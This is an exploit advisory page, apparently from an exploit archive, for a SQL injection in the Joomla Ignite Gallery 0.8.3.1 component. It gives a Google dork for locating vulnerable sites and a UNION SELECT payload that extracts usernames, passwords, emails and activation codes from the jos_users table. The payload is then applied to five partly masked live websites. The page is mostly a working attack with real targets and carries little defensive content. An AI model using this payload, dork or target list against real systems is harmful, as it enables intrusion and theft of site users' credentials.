Joomla Ignite Gallery 0.8.3.1 SQL Injection

2013.01.08

Credit: Ur0b0r0x

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: inurl:\"option=com_ignitegallery\"

               -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                 INDEPENDENT SECURITY RESEARCHER 
                   PENETRATION TESTING SECURITY
               -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
# Author: Ur0b0r0x
# Tiwtte: @Ur0b0r0x
# Email:  ur0b0r0x_@live.com
# Line:   GreyHat
# Home:   ur0b0r0x.blogspot.com

# Exploit Title: Joomla Component - Ignite Gallery 0.8.3.1 - Sql Injection Vulnerability
# dork: inurl:"option=com_ignitegallery"
# Date: 05/01/2013
# Author: Ur0b0r0x
# Url Vendor: www.ignitegallery.com
# Vendor Name: Ignite Gallery
# Tested On: Backtrack R3 / Linux Mint
# Type: php

------------------- Agreement --------------------
[29/12/2012] - Vulnerability discovered
[04/01/2013] - Vendor notified Dont responsed
[05/01/2013] - Public disclosure 
--------------------------------------------------

#Exploit/Sql:=> -1%20union%20select%201,2,concat%28username,0x3a,password,0x3a,email,0x3a,activation%29,4,5,6,7,8,9,10%20from%20jos_users--&Itemid=18&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9088e8&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9088e8

#Samples/Sql
http://www.biXXXn.com/index.php?option=com_ignitegallery&task=view&gallery=-1%20union%20select%201,2,concat%28username,0x3a,password,0x3a,email,0x3a,activation%29,4,5,6,7,8,9,10%20from%20jos_users--&Itemid=18&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9088e8&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9088e8
http://www.cXXXm.org/index.php?option=com_ignitegallery&task=view&gallery=-1%20union%20select%201,2,concat%28username,0x3a,password,0x3a,email,0x3a,activation%29,4,5,6,7,8,9,10%20from%20jos_users--&Itemid=18&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9088e8&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9088e8
http://www.plaXXXrary.org/index.php?option=com_ignitegallery&task=view&gallery=-1%20union%20select%201,2,concat%28username,0x3a,password,0x3a,email,0x3a,activation%29,4,5,6,7,8,9,10%20from%20jos_users--&Itemid=18&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9088e8&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9088e8
http://www.iesXXolleros.es/index.php?option=com_ignitegallery&task=view&gallery=-1%20union%20select%201,2,concat%28username,0x3a,password,0x3a,email,0x3a,activation%29,4,5,6,7,8,9,10%20from%20jos_users--&Itemid=18&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9088e8&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9088e8
http://www.riddimXXXorld.com/index.php?option=com_ignitegallery&task=view&gallery=-1%20union%20select%201,2,concat%28username,0x3a,password,0x3a,email,0x3a,activation%29,4,5,6,7,8,9,10%20from%20jos_users--&Itemid=18&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9088e8&3ca3a605131cf698f0c10708dbd5d5f5=b908cde49509d2ec9b39f7e46c9088e8

References:

http://www.ignitegallery.com/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla Ignite Gallery 0.8.3.1 SQL Injection

Dork: inurl:\"option=com_ignitegallery\"

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.